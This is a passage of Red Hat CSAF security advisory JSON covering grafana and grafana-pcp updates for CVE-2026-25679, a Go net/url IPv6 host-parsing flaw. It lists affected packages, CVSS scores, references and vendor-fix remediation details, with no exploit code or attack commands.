"grafana-selinux-0:10.2.6-22.el10_0.x86_64", "relates_to_product_reference": "AppStream-10.0.Z.E2S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.src", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T01:29:04+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.src", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8849"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.src", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.src", "AppStream-10.0.Z.E2S:grafana-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debuginfo-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-debugsource-0:10.2.6-22.el10_0.x86_64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.aarch64", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.ppc64le", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.s390x", "AppStream-10.0.Z.E2S:grafana-selinux-0:10.2.6-22.el10_0.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8849"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support and Red Hat Enterprise Linux 8.4 Extended Update Support Long-Life Add-On.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. \n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9043", "url": "https://access.redhat.com/errata/RHSA-2026:9043"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9043.json"}], "title": "Red Hat Security Advisory: grafana security update", "tracking": {"current_release_date": "2026-06-08T15:52:48+00:00", "generator": {"date": "2026-06-08T15:52:48+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9043", "initial_release_date": "2026-04-20T14:13:11+00:00", "revision_history": [{"date": "2026-04-20T14:13:11+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T14:13:11+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:48+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product": {"name": "Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_aus:8.4::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-0:7.3.6-13.el8_4.src", "product": {"name": "grafana-0:7.3.6-13.el8_4.src", "product_id": "grafana-0:7.3.6-13.el8_4.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@7.3.6-13.el8_4?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-0:7.3.6-13.el8_4.x86_64", "product": {"name": "grafana-0:7.3.6-13.el8_4.x86_64", "product_id": "grafana-0:7.3.6-13.el8_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@7.3.6-13.el8_4?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "product": {"name": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "product_id": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@7.3.6-13.el8_4?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-0:7.3.6-13.el8_4.src as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.src"}, "product_reference": "grafana-0:7.3.6-13.el8_4.src", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:7.3.6-13.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.x86_64"}, "product_reference": "grafana-0:7.3.6-13.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream AUS (v.8.4)", "product_id": "AppStream-8.4.0.Z.AUS:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"}, "product_reference": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.AUS"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:7.3.6-13.el8_4.src as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.src"}, "product_reference": "grafana-0:7.3.6-13.el8_4.src", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:7.3.6-13.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.x86_64"}, "product_reference": "grafana-0:7.3.6-13.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)", "product_id": "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"}, "product_reference": "grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "relates_to_product_reference": "AppStream-8.4.0.Z.EUS.EXTENSION"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T14:13:11+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9043"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.AUS:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.AUS:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.src", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-0:7.3.6-13.el8_4.x86_64", "AppStream-8.4.0.Z.EUS.EXTENSION:grafana-debuginfo-0:7.3.6-13.el8_4.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9043"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8949", "url": "https://access.redhat.com/errata/RHSA-2026:8949"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8949.json"}], "title": "Red Hat Security Advisory: grafana-pcp security update", "tracking": {"current_release_date": "2026-06-08T15:52:48+00:00", "generator": {"date": "2026-06-08T15:52:48+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8949", "initial_release_date": "2026-04-20T11:16:56+00:00", "revision_history": [{"date": "2026-04-20T11:16:56+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T11:16:56+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:48+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:9.0::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-6.el9_0.src", "product": {"name": "grafana-pcp-0:3.2.0-6.el9_0.src", "product_id": "grafana-pcp-0:3.2.0-6.el9_0.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-6.el9_0?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-6.el9_0.aarch64", "product": {"name": "grafana-pcp-0:3.2.0-6.el9_0.aarch64", "product_id": "grafana-pcp-0:3.2.0-6.el9_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-6.el9_0?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "product_id": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-6.el9_0?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "product": {"name": "grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "product_id": "grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-6.el9_0?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "product_id": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-6.el9_0?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-6.el9_0.x86_64", "product": {"name": "grafana-pcp-0:3.2.0-6.el9_0.x86_64", "product_id": "grafana-pcp-0:3.2.0-6.el9_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-6.el9_0?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64", "product_id": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-6.el9_0?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "grafana-pcp-0:3.2.0-6.el9_0.s390x", "product": {"name": "grafana-pcp-0:3.2.0-6.el9_0.s390x", "product_id": "grafana-pcp-0:3.2.0-6.el9_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp@3.2.0-6.el9_0?arch=s390x"}}}, {"category": "product_version", "name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "product": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "product_id": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-pcp-debuginfo@3.2.0-6.el9_0?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-6.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.aarch64"}, "product_reference": "grafana-pcp-0:3.2.0-6.el9_0.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-6.el9_0.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.ppc64le"}, "product_reference": "grafana-pcp-0:3.2.0-6.el9_0.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-6.el9_0.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.s390x"}, "product_reference": "grafana-pcp-0:3.2.0-6.el9_0.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-6.el9_0.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.src"}, "product_reference": "grafana-pcp-0:3.2.0-6.el9_0.src", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-0:3.2.0-6.el9_0.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:grafana-pcp-0:3.2.0-6.el9_0.x86_64"}, "product_reference": "grafana-pcp-0:3.2.0-6.el9_0.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-pcp-debuginfo-0:3.2.0-6.el9_0.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": 